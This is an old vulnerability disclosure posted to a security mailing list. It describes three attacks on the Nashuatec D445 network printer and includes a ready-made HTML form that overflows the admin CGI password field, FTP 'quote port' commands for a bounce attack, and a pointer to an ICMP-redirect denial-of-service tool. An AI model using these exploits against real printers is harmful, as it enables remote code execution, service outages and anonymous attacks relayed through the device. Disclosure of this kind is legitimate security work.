NEUROCOM: Nashuatec printer, 3 vulnerabilities found

[veille () NEUROCOM COM (gregory duchemin)]

hi,

The NASHUATEC D445 printer is vulnerabled to many attacks.
There are 4 communs services that run in a standard 
configuration: httpd, ftpd, telnetd, printer.
(tested with nmap)

I discovered last day, at least three differents ways to 
attack this kind of boxes.

First, it's possible to configure remotly the server via its 
own admin web server (port 80).
Naturaly the server 'll ask u for an admin password before 
submiting the form to the cgi. The password field is 15 
chars length but an intruder with a lightly modified copy of 
the original form 'll be able to submit many more chars ( 
about 260 will be enough for the test ) to the cgi and 
produce a buffer overflow.( see the example below )
The cgi concerned is "reset" but i suppose, every cgi are 
exposed to this problem.
If our intruder decide to forge a special password with 
instruction code inside he'll force the remote printer to 
execute code with the target web server priviledge.
I don't have, now, all the required informations to gain 
server priviledge but u may find it here very soon :)

Attacker form example:

<HTML>
<HEAD>
<TITLE>Nashuadeath</TITLE>
</HEAD>
<BODY>
<HR>
<CENTER><FONT SIZE=+2><big><B>NIB 
450-E</B></big></FONT></CENTER>
<HR>
<CENTER><FONT SIZE=+2>Unit Serial Number 
599132</FONT></CENTER>
<HR>
<H2><CENTER>Reset Unit</H2>
<HR>
<FORM ENCTYPE="x-www-form-encoded" METHOD="POST" 
ACTION="http://victim-printer-ip/Forms/reset";>
<B>A very big password is required to perform this function 
( at least 260 chars length ).</B>
<INPUT TYPE="text" NAME="http_pwd" SIZE="100" 
MAXLENGTH="1500">
<INPUT TYPE="SUBMIT" NAME="Submit" VALUE="T3st M3 PL3ase">
</FORM>

<HR>

<CENTER>[ Home | <A HREF="/info">Unit 
Info</A> ]
</CENTER>
</BODY>
</HTML>

another flaw is present in the ftp daemon that permit the 
infamous "bounce attack".
ftp printer.victim.com
user xxxxx
pass xxxxx
quote port a1,a2,a3,a4,0,25

a1.a2.a3.a4 is every other ip adress.

the ftp server doesn't check neither the type of port in the 
request ( < 1024 = administrative port ) nor the ip adress 
used.
So an intruder may use the service to attack some ohter 
boxes anonymously.

The last one is a denial of service with an icmp redirect 
storm against the printer ip stack. 
Use winfreez.c to test it.
The printer 'll not respond anymore during the attack.

Have a nice day,

Gregory Duchemin.

-------------------------
NEUROCOM
http://www.neurocom.com
179/181 Avenue Charles de Gaulle
92200 Neuilly Sur Seine
Tel: 01.41.43.84.84     Fax: 01.41.43.84.80